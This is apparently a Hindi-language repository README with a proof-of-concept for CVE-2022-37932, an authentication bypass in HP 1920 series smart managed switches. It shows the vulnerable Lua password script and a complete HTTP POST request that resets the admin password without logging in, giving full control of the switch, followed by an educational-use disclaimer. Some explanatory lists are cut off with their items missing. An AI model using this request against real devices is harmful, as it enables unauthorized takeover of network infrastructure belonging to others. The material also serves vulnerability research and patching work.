
CVE-2022-37932 के लिए प्रूफ-ऑफ-कॉन्सेप्ट शोषण और तकनीकी विश्लेषण, HP 1920 सीरीज़ स्मार्ट मैनेज्ड स्विचेस में एक प्रमाणीकरण बायपास कमजोरी जो बिना प्रमाणीकरण के एडमिन पासवर्ड बदलने की अनुमति देती है।
फर्मवेयर संस्करण: PD.02.21
प्रभावित उपकरण: HP 1920 सीरीज़ स्मार्ट मैनेज्ड स्विच
यह रिपॉजिटरी HP 1920 सीरीज़ स्मार्ट मैनेज्ड स्विच में फर्मवेयर संस्करण PD.02.21 चलाने वाले उपकरणों में एक गंभीर प्रमाणीकरण बाईपास भेद्यता का दस्तावेजीकरण करती है। यह भेद्यता एक अप्रमाणित हमलावर को बिना किसी पूर्व प्रमाणीकरण के एडमिन पासवर्ड बदलने की अनुमति देती है, जिससे उपकरण का पूर्ण अधिग्रहण संभव हो जाता है।
यह भेद्यता /login/default_password_cfg.lua स्क्रिप्ट में मौजूद है, जो उपकरण के डिफ़ॉल्ट पासवर्ड को बदलने का कार्य संभालती है। यह स्क्रिप्ट:
oldPwd पैरामीटर डिफ़ॉल्ट पासवर्ड से मेल खाता है (जो खाली/रिक्त है)default_password_cfg.lua में मुख्य भेद्य अनुभाग:
if (request_method == 'POST') then
-- कोई प्रमाणीकरण या सत्र जाँच नहीं!
local defaultPassword = fpaux.string_const("FD_USER_MGR_DEFAULT_PASSWORD")
-- ...
if form_post.oldPwd ~= defaultPassword then
errorStatus = "401 Unauthorized"
errorText = label.old_password_mismatch
else
-- पासवर्ड बदलने के लिए आगे बढ़ता है
-- ...
end
end
स्क्रिप्ट में महत्वपूर्ण सुरक्षा नियंत्रणों का अभाव है:
एक हमलावर इस भेद्यता का शोषण एक सरल HTTP POST अनुरोध का उपयोग करके कर सकता है:
POST /login/default_password_cfg.lua HTTP/1.1
Host: [target-ip]
Content-Type: application/x-www-form-urlencoded
Content-Length: [length]
username=admin&oldPwd=&newPwd=[new-password]&confirmPwd=[new-password]
नोट: oldPwd पैरामीटर खाली छोड़ा गया है क्योंकि डिफ़ॉल्ट पासवर्ड रिक्त है।
यह भेद्यता एक अप्रमाणित हमलावर को अनुमति देती है:
मेरे पास यह शोध करने का समय नहीं था कि इस भेद्यता की मूल खोज किसने की, मैं केवल एक प्रूफ ऑफ कॉन्सेप्ट पोस्ट कर रहा हूँ।
यह जानकारी केवल शैक्षिक उद्देश्यों के लिए प्रदान की गई है। लेखक इस जानकारी के किसी भी दुरुपयोग के लिए उत्तरदायी नहीं है। भेद्यताओं का परीक्षण करने से पहले हमेशा उचित प्राधिकरण प्राप्त करें।